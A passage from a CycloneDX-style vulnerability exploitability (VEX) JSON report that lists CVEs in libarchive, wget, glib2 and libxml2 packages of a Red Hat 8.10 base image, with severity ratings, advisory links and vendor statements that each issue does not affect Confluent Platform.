          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-15028",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        805,
        122
      ],
      "description": "A flaw was found in libarchive. This vulnerability allows a remote attacker to trigger a heap overflow by providing a specially crafted tar archive. The issue occurs during the parsing of a PAX extended header containing a malformed SUN.holesdata sparse-file attribute. Successful exploitation could lead to a denial of service, making the system unavailable, or potentially allow for arbitrary code execution, giving the attacker control over the affected system.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-15028"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:38279"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-15028"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497970"
        },
        {
          "url": "https://github.com/libarchive/libarchive/issues/3251"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/3253"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-15028"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8581-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-15028"
        }
      ],
      "published": "2026-07-10T10:16:23+00:00",
      "updated": "2026-08-19T11:16:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.3.3-7.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-15146",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "description": "GNU Wget does not validate the IP address provided by an FTP PASV response while operating in FTP passive mode. A malicious FTP server, or an HTTP server that redirects to an FTP URL, can exploit this behavior to redirect Wget\u2019s data connection to an arbitrary IP address and port. This allows an attacker to forge server-side requests (SSRF) from the machine running Wget, potentially accessing localhost services or internal network resources.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-15146"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-15146"
        },
        {
          "url": "https://cgit.git.savannah.gnu.org/cgit/wget.git/commit/?id=4f85853f641863d5915786a8413e1a213726a62b"
        },
        {
          "url": "https://kb.cert.org/vuls/id/564823"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-15146"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8572-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-15146"
        },
        {
          "url": "https://www.kb.cert.org/vuls/id/564823"
        }
      ],
      "published": "2026-07-10T19:17:20+00:00",
      "updated": "2026-07-15T19:16:57+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.19.5-12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-15588",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        770
      ],
      "description": "A denial-of-service and resource exhaustion vulnerability exists within the `GDBus` component of GLib. The `gdbusauth` authentication mechanism fails to enforce proper length limitations on data lines read from a client. An unauthenticated local or remote attacker can exploit this lack of input validation by sending excessively long streams of data, causing the application to consume massive amounts of system memory and CPU, potentially leading to a crash or system hang.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-15588"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:39985"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:40485"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42329"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55440"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:57015"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-15588"
        },
        {
          "url": "https://bugzilla.redhat.com/2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/2499675"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2499675"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-15588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58015"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55440.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55440"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3985"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-15588.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55440.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-15588"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-15588"
        }
      ],
      "published": "2026-07-20T12:17:55+00:00",
      "updated": "2026-08-19T18:16:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image library (glib2 GDBus) whose D-Bus IPC server is never opened by any product code."
      }
    },
    {
      "id": "CVE-2026-16517",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        190
      ],
      "description": "A signed integer overflow vulnerability was found in libarchive's ZIP writer. In the archive_write_zip_header function in archive_write_set_format_zip.c, when ZIP encryption is enabled and the entry file size is close to INT64_MAX, the addition of the encryption overhead to the entry size overflows int64_t, resulting in undefined behavior. This could lead to incorrect Zip64 extension decisions or potential memory corruption.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-16517"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43818"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-16517"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2505492"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-16517"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-16517"
        }
      ],
      "published": "2026-07-21T23:17:00+00:00",
      "updated": "2026-08-19T11:16:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.3.3-7.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-1757",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        401
      ],
      "description": "A flaw was identified in the interactive shell of the xmllint utility, part of the libxml2 project, where memory allocated for user input is not properly released under certain conditions. When a user submits input consisting only of whitespace, the program skips command execution but fails to free the allocated buffer. Repeating this action causes memory to continuously accumulate. Over time, this can exhaust system memory and terminate the xmllint process, creating a denial-of-service condition on the local system.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-1757"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7519"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1757"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2435940"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/1009"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1757"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8460-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1757"
        }
      ],
      "published": "2026-02-02T13:15:58+00:00",
      "updated": "2026-06-17T10:16:28+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.9.7-21.el8_10.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
